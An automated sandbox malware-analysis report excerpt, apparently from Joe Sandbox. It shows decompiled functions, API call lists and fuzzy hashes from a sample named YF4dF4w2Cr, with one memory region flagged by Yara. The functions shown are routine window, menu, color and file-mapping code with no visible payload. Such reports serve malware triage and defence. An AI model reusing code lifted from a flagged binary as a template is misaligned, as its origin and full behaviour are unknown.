                    • Part of subcall function 004042A0: WaitForSingleObject.KERNEL32(?,00000000,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042DE
                    • Part of subcall function 004042A0: SendMessageA.USER32(?,00000401,00000064,00000000), ref: 00404353
                  • SetEvent.KERNEL32(?), ref: 00401058
                  • PostMessageA.USER32 ref: 0040106F
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401077
                  • SetEvent.KERNEL32(?), ref: 00401083
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ObjectSingleWait$Event$Message$PostResetSend
                  • String ID:
                  • API String ID: 2693790096-0
                  • Opcode ID: 7c818635be2d97c96777eab090e09d629f6dcbd405f1c48e9043e2034b7e17b1
                  • Instruction ID: 0d77731ecac0447bacbc28320ec0c646970e3b0a9206e2ca7128ab913cbacf71
                  • Opcode Fuzzy Hash: 7c818635be2d97c96777eab090e09d629f6dcbd405f1c48e9043e2034b7e17b1
                  • Instruction Fuzzy Hash: 82111F75200701ABD620DFAADC84E13B3EDBF88B10B108A2DB665D36D0DA74F8008B68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetParent.USER32(0000E900), ref: 0040CEF0
                  • GetWindowRect.USER32 ref: 0040CF0B
                  • ScreenToClient.USER32 ref: 0040CF1E
                  • ScreenToClient.USER32 ref: 0040CF27
                  • EqualRect.USER32 ref: 0040CF31
                  • DeferWindowPos.USER32(?,0000E900,00000000,?,?,?,?,00000014), ref: 0040CF59
                  • SetWindowPos.USER32(0000E900,00000000,?,?,?,?,00000014,?,00000001), ref: 0040CF63
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ClientRectScreen$DeferEqualParent
                  • String ID:
                  • API String ID: 443303494-0
                  • Opcode ID: 9dd0b80c57cd055b5c3aae39b5d4aa4e3f334b3c2dd04950780753353c1d00f6
                  • Instruction ID: cfd9feb092fbb54a836aacfe93016eac0eb2fe96b6d959632a20acd86b66a086
                  • Opcode Fuzzy Hash: 9dd0b80c57cd055b5c3aae39b5d4aa4e3f334b3c2dd04950780753353c1d00f6
                  • Instruction Fuzzy Hash: 5911307650020AFFD7109FA5DC84DAB7BBDFB88710F14852ABD16A3254E730E900CB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateFileW.KERNEL32(02322E20,80000000,00000001,00000000,00000003,00000000,00000000,00000102,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D0FF
                  • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D114
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D126
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D135
                  • UnmapViewOfFile.KERNEL32(00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D14B
                  • CloseHandle.KERNEL32(00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D152
                  • CloseHandle.KERNEL32(00000000,?,?,0231D676,00000102,0231AC19,?,0231AC8F), ref: 0231D159
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                  • String ID:
                  • API String ID: 1223616889-0
                  • Opcode ID: 576a16f398f89dd8e0dc0a833ce92fc83bf94aaa179ec59eab3918353f0bcb3c
                  • Instruction ID: 9547a534eee5277f659b1d9c94988c53b7fa4018f5af1119bbd8b59e4a469c3e
                  • Opcode Fuzzy Hash: 576a16f398f89dd8e0dc0a833ce92fc83bf94aaa179ec59eab3918353f0bcb3c
                  • Instruction Fuzzy Hash: 420131F2A8121C7FF33516A46DCDF7B366CEB59B99F020529FA0191280D7A44C1D4670
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E0042094A(void* __ecx, long* __edi, void* __esi) {
                  				long _t22;
                  				void* _t23;
                  				void* _t28;
                  				void* _t31;
                  				void* _t33;
                  				signed int _t35;
                  				long* _t40;
                  				void* _t41;
                  				void* _t42;
                  
                  				_t41 = __esi;
                  				_t40 = __edi;
                  				_t31 = __ecx;
                  				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                  				E00430CF4(0, 0);
                  				_t22 = E004148C1(_t31, 0, __edi[3], 4);
                  				_t33 = 2;
                  				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                  				_t46 = _t23;
                  				if(_t23 == 0) {
                  					LeaveCriticalSection( *(_t42 - 0x14));
                  					_t23 = E004063FE(0, _t33, __edi, __esi, _t46);
                  				}
                  				 *(_t41 + 0xc) = _t23;
                  				E00431160(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                  				 *(_t41 + 8) = _t40[3];
                  				TlsSetValue( *_t40, _t41);
                  				_t35 =  *(_t42 + 8);
                  				_t28 =  *(_t41 + 0xc);
                  				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                  					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                  				}
                  				_push( *(_t42 - 0x14));
                  				LeaveCriticalSection();
                  				return E00431B73(_t28);
                  			}













                  APIs
                  • LeaveCriticalSection.KERNEL32(?), ref: 00420951
                  • __CxxThrowException@8.LIBCMT ref: 0042095B
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 00420972
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 0042097F
                    • Part of subcall function 004063FE: __CxxThrowException@8.LIBCMT ref: 00406414
                  • _memset.LIBCMT ref: 0042099E
                  • TlsSetValue.KERNEL32(?,00000000,0041F372,00406452,00411FA3), ref: 004209AF
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004209D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                  • String ID:
                  • API String ID: 356813703-0
                  • Opcode ID: af9ad24891c458db921cd8b6e4028670f66e224599244f3ca0a8739f32a8bdb8
                  • Instruction ID: 35073c979330c48db295c3963723042328dd249a9d273a9f0c0c6630b77ded6a
                  • Opcode Fuzzy Hash: af9ad24891c458db921cd8b6e4028670f66e224599244f3ca0a8739f32a8bdb8
                  • Instruction Fuzzy Hash: E2118EB4100606AFEB10AF65DC85D6BBBB9FF44318B10C53EF55696662CB34AC60CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00438A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t15;
                  				LONG* _t21;
                  				long _t23;
                  				void* _t31;
                  				LONG* _t33;
                  				void* _t34;
                  				void* _t35;
                  
                  				_t35 = __eflags;
                  				_t29 = __edx;
                  				_t25 = __ebx;
                  				_push(0xc);
                  				_push(0x45e210);
                  				E00431818(__ebx, __edi, __esi);
                  				_t31 = E00436178(__ebx, __edx, __edi, _t35);
                  				_t15 =  *0x463b44; // 0xfffffffe
                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                  					E0043A0BF(_t25, 0xd);
                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                  					_t33 =  *(_t31 + 0x68);
                  					 *(_t34 - 0x1c) = _t33;
                  					__eflags = _t33 -  *0x463a48; // 0x2431600
                  					if(__eflags != 0) {
                  						__eflags = _t33;
                  						if(_t33 != 0) {
                  							_t23 = InterlockedDecrement(_t33);
                  							__eflags = _t23;
                  							if(_t23 == 0) {
                  								__eflags = _t33 - 0x463620;
                  								if(__eflags != 0) {
                  									_push(_t33);
                  									E004316F6(_t25, _t31, _t33, __eflags);
                  								}
                  							}
                  						}
                  						_t21 =  *0x463a48; // 0x2431600
                  						 *(_t31 + 0x68) = _t21;
                  						_t33 =  *0x463a48; // 0x2431600
                  						 *(_t34 - 0x1c) = _t33;
                  						InterlockedIncrement(_t33);
                  					}
                  					 *(_t34 - 4) = 0xfffffffe;
                  					E00438B1B();
                  				} else {
                  					_t33 =  *(_t31 + 0x68);
                  				}
                  				if(_t33 == 0) {
                  					E0043395F(_t29, _t31, 0x20);
                  				}
                  				return E0043185D(_t33);
                  			}











                  APIs
                  • __getptd.LIBCMT ref: 00438A8C
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __amsg_exit.LIBCMT ref: 00438AAC
                  • __lock.LIBCMT ref: 00438ABC
                  • InterlockedDecrement.KERNEL32(?), ref: 00438AD9
                  • InterlockedIncrement.KERNEL32(02431600), ref: 00438B04
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                  • String ID: 6F
                  • API String ID: 4271482742-3517966882
                  • Opcode ID: 6c584e623dab6ad2db5e4a70b67004d1be87bba4eab4fad9846b8a59ee196114
                  • Instruction ID: 2a7e21e7e983cbed5c811cbe98960c0c60f51e7b7e610d5969f46117a2a2e828
                  • Opcode Fuzzy Hash: 6c584e623dab6ad2db5e4a70b67004d1be87bba4eab4fad9846b8a59ee196114
                  • Instruction Fuzzy Hash: 45018231900722ABC725BF65980574AF760AB08725F14601FF80067792DBBC6A41CBDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00420379(void* __ecx) {
                  				struct HBRUSH__* _t14;
                  				void* _t18;
                  
                  				_t18 = __ecx;
                  				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                  				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                  				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                  				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                  				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                  				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                  				_t14 = GetSysColorBrush(6);
                  				 *(_t18 + 0x20) = _t14;
                  				return _t14;
                  			}






                  APIs
                  • GetSysColor.USER32(0000000F), ref: 00420387
                  • GetSysColor.USER32(00000010), ref: 0042038E
                  • GetSysColor.USER32(00000014), ref: 00420395
                  • GetSysColor.USER32(00000012), ref: 0042039C
                  • GetSysColor.USER32(00000006), ref: 004203A3
                  • GetSysColorBrush.USER32(0000000F), ref: 004203B0
                  • GetSysColorBrush.USER32(00000006), ref: 004203B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$Brush
                  • String ID:
                  • API String ID: 2798902688-0
                  • Opcode ID: bbd7f8a36c46f4b64160d0f99ed0faba5aa863649304fb25e67fbe5355e6cc7b
                  • Instruction ID: 65459e24616037a58442e39c341cc04108a4acc29dfa35b8cf1959434db4eedb
                  • Opcode Fuzzy Hash: bbd7f8a36c46f4b64160d0f99ed0faba5aa863649304fb25e67fbe5355e6cc7b
                  • Instruction Fuzzy Hash: 2BF0FE719407445BD730BB735D09B47BAD1FFC4710F02092AD2458B990D6B5E441DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 004252FF: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00425341
                    • Part of subcall function 004252FF: SetRectEmpty.USER32(?), ref: 00425365
                    • Part of subcall function 004252FF: GetDesktopWindow.USER32 ref: 0042537D
                    • Part of subcall function 004252FF: LockWindowUpdate.USER32(?,00000000), ref: 0042538E
                    • Part of subcall function 00422744: GetModuleHandleA.KERNEL32(GDI32.DLL,?,00425A15), ref: 0042274E
                    • Part of subcall function 00422744: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0042275A
                  • GetWindowRect.USER32 ref: 00425A3B
                    • Part of subcall function 0042277C: GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 0042278A
                    • Part of subcall function 0042277C: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 00422798
                  • InflateRect.USER32(?,00000002,00000002), ref: 00425B2D
                  • InflateRect.USER32(?,00000002,00000002), ref: 00425CD3
                    • Part of subcall function 00425158: OffsetRect.USER32(?,?,?), ref: 00425191
                    • Part of subcall function 004258CF: GetCapture.USER32 ref: 004258E2
                    • Part of subcall function 004258CF: SetCapture.USER32(?), ref: 004258F2
                    • Part of subcall function 004258CF: GetCapture.USER32 ref: 004258FE
                    • Part of subcall function 004258CF: GetMessageA.USER32 ref: 00425918
                    • Part of subcall function 004258CF: DispatchMessageA.USER32 ref: 0042594A
                    • Part of subcall function 004258CF: GetCapture.USER32 ref: 004259A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockOffsetPeekUpdate
                  • String ID:
                  • API String ID: 221289759-0
                  • Opcode ID: d943f231d7be530f07c4eda08ec3b72a0e252f1dabaf051c3bf496005de74c4f
                  • Instruction ID: ac46d1c6308f4bac6d73068d2dc0d1780985543c5d8d613698189d1b59e5ddf4
                  • Opcode Fuzzy Hash: d943f231d7be530f07c4eda08ec3b72a0e252f1dabaf051c3bf496005de74c4f
                  • Instruction Fuzzy Hash: E8B15A32A00619AFCF01DFA4D881EEE7BBAFF49310F044195FD05AB265D771AA44CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E0041BD1E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				struct HDC__* _t86;
                  				intOrPtr* _t87;
                  				struct HDC__* _t96;
                  				intOrPtr _t97;
                  				struct HDC__* _t110;
                  				intOrPtr _t122;
                  				intOrPtr* _t126;
                  				intOrPtr* _t137;
                  				struct HDC__** _t138;
                  				intOrPtr _t151;
                  				intOrPtr _t155;
                  				signed short _t170;
                  				void* _t177;
                  				void* _t178;
                  				void* _t179;
                  
                  				_t179 = __eflags;
                  				_push(0x1c);
                  				E00431A9B(E0044B973, __ebx, __edi, __esi);
                  				_t177 = __ecx;
                  				 *(__ecx + 0x8c) =  *(_t178 + 8);
                  				_t86 = E00404461(_t179, 0x40);
                  				 *(_t178 + 8) = _t86;
                  				 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
                  				_t180 = _t86;
                  				if(_t86 == 0) {
                  					_t87 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t87 = E0041A640(__ebx, _t86, __edx, __edi, _t177, _t180);
                  				}
                  				 *(_t178 - 4) =  *(_t178 - 4) | 0xffffffff;
                  				 *((intOrPtr*)(_t177 + 0x134)) = _t87;
                  				 *((intOrPtr*)( *_t87 + 0x54)) = 0x7009;
                  				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x14) | 0x00000040;
                  				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x14) & 0xfffffeff;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)) + 8)) = 1;
                  				_t96 = E00404461(_t180, 0x40);
                  				 *(_t178 + 8) = _t96;
                  				 *(_t178 - 4) = 1;
                  				_t181 = _t96;
                  				if(_t96 == 0) {
                  					_t97 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t97 = E0042CFA7(_t96, _t181);
                  				}
                  				_push( *((intOrPtr*)(_t177 + 0x134)));
                  				 *(_t178 - 4) =  *(_t178 - 4) | 0xffffffff;
                  				 *((intOrPtr*)(_t177 + 0x90)) = _t97;
                  				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x8c)))) + 0x178))() != 0) {
                  					_t137 = _t177 + 0x94;
                  					E00422D9D(_t137, _t137, 1,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x10)));
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x90)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x10)));
                  					 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x90)) + 0xc)) = 1;
                  					 *((intOrPtr*)(_t177 + 0xa0)) = 1;
                  					 *((intOrPtr*)( *_t137 + 0x1c))();
                  					_t110 = GetDC( *(_t177 + 0x20));
                  					 *(_t178 + 8) = _t110;
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x90)))) + 0x10))(_t110);
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x8c)))) + 0x17c))( *((intOrPtr*)(_t177 + 0x90)),  *((intOrPtr*)(_t177 + 0x134)));
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x90)))) + 0x18))();
                  					ReleaseDC( *(_t177 + 0x20),  *(_t178 + 8));
                  					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
                  					_t138 = _t177 + 0x9c;
                  					 *((intOrPtr*)(_t177 + 0x124)) = GetDeviceCaps( *_t138, 0x58);
                  					 *((intOrPtr*)(_t177 + 0x128)) = GetDeviceCaps( *_t138, 0x5a);
                  					_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)) + 0x18));
                  					 *((intOrPtr*)(_t177 + 0x118)) = _t122;
                  					_t183 = _t122;
                  					if(_t122 != 0) {
                  						_t151 =  *((intOrPtr*)(_t177 + 0x110));
                  						__eflags = _t122 - _t151;
                  						if(__eflags > 0) {
                  							 *((intOrPtr*)(_t177 + 0x118)) = _t151;
                  						}
                  					} else {
                  						 *((intOrPtr*)(_t177 + 0x118)) = 1;
                  					}
                  					 *((intOrPtr*)(_t177 + 0x108)) =  *((intOrPtr*)(_t177 + 0x118));
                  					_push(0x4527fc);
                  					_push(0x4527fc);
                  					_push(1);
                  					_push(1);
                  					_push(1);
                  					E00419E93(_t138, _t177, 1, _t177, _t183);
                  					_t126 =  *((intOrPtr*)(_t177 + 0x134));
                  					_t155 =  *((intOrPtr*)( *_t126 + 0x74));
                  					_t170 =  *(_t155 + 0x1e) & 0x0000ffff;
                  					if(_t170 >= 0x8000 || (_t170 & 0x0000ffff) - ( *(_t155 + 0x1c) & 0x0000ffff) > 0x7fff) {
                  						ShowScrollBar( *(_t177 + 0x20), 1, 0);
                  					} else {
                  						 *((intOrPtr*)(_t178 - 0x24)) = 3;
                  						 *(_t178 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x74)) + 0x1c) & 0x0000ffff;
                  						 *(_t178 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x74)) + 0x1e) & 0x0000ffff;
                  						 *((intOrPtr*)(_t178 - 0x18)) = 1;
                  						if(E0040CE62(_t177, 1, _t178 - 0x28, 0) == 0) {
                  							E0040DAD4(_t177, 1,  *(_t178 - 0x20),  *(_t178 - 0x1c), _t134);
                  						}
                  					}
                  					E0041BAC8(_t177,  *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)) + 0x14)), 1);
                  				}
                  				return E00431B73(1);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041BD25
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • GetDC.USER32(?), ref: 0041BE23
                  • ReleaseDC.USER32 ref: 0041BE63
                  • GetDeviceCaps.GDI32(?,00000058), ref: 0041BE7C
                  • GetDeviceCaps.GDI32(?,0000005A), ref: 0041BE8C
                    • Part of subcall function 0041A640: __EH_prolog3.LIBCMT ref: 0041A647
                  • ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,004527FC,004527FC), ref: 0041BF57
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceH_prolog3$ReleaseScrollShow_malloc
                  • String ID:
                  • API String ID: 1562107534-0
                  • Opcode ID: 01a3991f0f1f20f80a4ca669fb0ae59081bcd1eef430dde7ee83eab0a47d67fc
                  • Instruction ID: 2ce643b0088d7514c621479e681820788cef9607f7a2c67b11f747b9a6edd5a3
                  • Opcode Fuzzy Hash: 01a3991f0f1f20f80a4ca669fb0ae59081bcd1eef430dde7ee83eab0a47d67fc
                  • Instruction Fuzzy Hash: 6871E3746006009FDB14DF75C985BAABBF1FF49300F10496EE9AA8B3A1DB34E941DB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E0040949A(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                  				intOrPtr* _v8;
                  				intOrPtr _v12;
                  				int _v16;
                  				signed int _v32;
                  				intOrPtr _v36;
                  				signed int _v40;
                  				int _v44;
                  				char _v48;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t53;
                  				intOrPtr* _t54;
                  				struct HMENU__* _t58;
                  				int _t59;
                  				int _t60;
                  				struct HMENU__* _t61;
                  				int _t63;
                  				void* _t65;
                  				signed int _t67;
                  				int _t68;
                  				struct HMENU__* _t69;
                  				struct HMENU__* _t70;
                  				int _t71;
                  				intOrPtr* _t75;
                  				int _t78;
                  				struct HMENU__* _t86;
                  				intOrPtr _t90;
                  				intOrPtr* _t92;
                  				int _t93;
                  				struct HMENU__* _t94;
                  
                  				_t79 = __ecx;
                  				_t92 = __ecx;
                  				_v8 = __ecx;
                  				_t53 = E0041FEC0( *((intOrPtr*)(__ecx + 0x20)));
                  				if(_a12 == 0) {
                  					_t54 = __ecx + 0x80;
                  					_t90 = _a4;
                  					if( *_t54 == 0) {
                  						L3:
                  						_t98 = _t90;
                  						if(_t90 == 0) {
                  							E00406436(0, _t79, _t90, _t92, _t98);
                  						}
                  						E004125EB( &_v48);
                  						_v36 = _t90;
                  						if( *((intOrPtr*)(E0041EDAB(0, _t90, _t92, _t98) + 0x78)) !=  *(_t90 + 4)) {
                  							__eflags =  *((intOrPtr*)(_t92 + 0xd4)) - 1;
                  							if( *((intOrPtr*)(_t92 + 0xd4)) != 1) {
                  								_t58 =  *(_t92 + 0xd8);
                  							} else {
                  								_t58 = GetMenu( *(_t92 + 0x20));
                  							}
                  							__eflags = _t58;
                  							if(_t58 == 0) {
                  								goto L20;
                  							} else {
                  								_t69 = E004105B2(0, _t92, _t90);
                  								__eflags = _t69;
                  								if(_t69 == 0) {
                  									goto L20;
                  								}
                  								_t86 = _t69;
                  								_t70 =  *((intOrPtr*)(_t69->i + 0x6c))();
                  								__eflags = _t70;
                  								if(_t70 == 0) {
                  									goto L20;
                  								}
                  								_t94 =  *(_t70 + 4);
                  								__eflags = _t94;
                  								if(_t94 == 0) {
                  									L19:
                  									_t92 = _v8;
                  									goto L20;
                  								}
                  								_t71 = GetMenuItemCount(_t94);
                  								_t78 = 0;
                  								_a12 = _t71;
                  								__eflags = _t71;
                  								if(_t71 <= 0) {
                  									goto L19;
                  								} else {
                  									goto L15;
                  								}
                  								while(1) {
                  									L15:
                  									__eflags = GetSubMenu(_t94, _t78) -  *(_t90 + 4);
                  									if(__eflags == 0) {
                  										break;
                  									}
                  									_t78 = _t78 + 1;
                  									__eflags = _t78 - _a12;
                  									if(_t78 < _a12) {
                  										continue;
                  									}
                  									goto L19;
                  								}
                  								_v12 = E0041F4E8(_t78, _t86, _t90, _t94, __eflags, _t94);
                  								goto L19;
                  							}
                  						} else {
                  							_v12 = _t90;
                  							L20:
                  							_t59 = GetMenuItemCount( *(_t90 + 4));
                  							_v40 = _v40 & 0x00000000;
                  							_v16 = _t59;
                  							if(_t59 <= 0) {
                  								L39:
                  								return _t59;
                  							} else {
                  								goto L21;
                  							}
                  							do {
                  								L21:
                  								_t60 = E004087B8(_t90, _v40);
                  								_v44 = _t60;
                  								if(_t60 == 0) {
                  									goto L38;
                  								}
                  								if(_t60 != 0xffffffff) {
                  									_v32 = _v32 & 0x00000000;
                  									__eflags =  *(_t92 + 0x54);
                  									if( *(_t92 + 0x54) == 0) {
                  										L30:
                  										_t61 = 0;
                  										__eflags = 0;
                  										L31:
                  										_push(_t61);
                  										L32:
                  										_push(_t92);
                  										E00412611( &_v48);
                  										_t63 = GetMenuItemCount( *(_t90 + 4));
                  										_t93 = _t63;
                  										if(_t93 >= _v16) {
                  											L37:
                  											_v16 = _t93;
                  											_t92 = _v8;
                  											goto L38;
                  										}
                  										_v40 = _v40 + _t63 - _v16;
                  										while(_v40 < _t93) {
                  											_t65 = E004087B8(_t90, _v40);
                  											__eflags = _t65 - _v44;
                  											if(_t65 != _v44) {
                  												goto L37;
                  											}
                  											_t44 =  &_v40;
                  											 *_t44 = _v40 + 1;
                  											__eflags =  *_t44;
                  										}
                  										goto L37;
                  									}
                  									__eflags = _t60 - 0xf000;
                  									if(_t60 >= 0xf000) {
                  										goto L30;
                  									}
                  									_t61 = 1;
                  									goto L31;
                  								}
                  								_t67 = E004049DB(_t90, _v40);
                  								_v32 = _t67;
                  								if(_t67 == 0) {
                  									goto L38;
                  								}
                  								_t68 = GetMenuItemID( *(_t67 + 4), 0);
                  								_v44 = _t68;
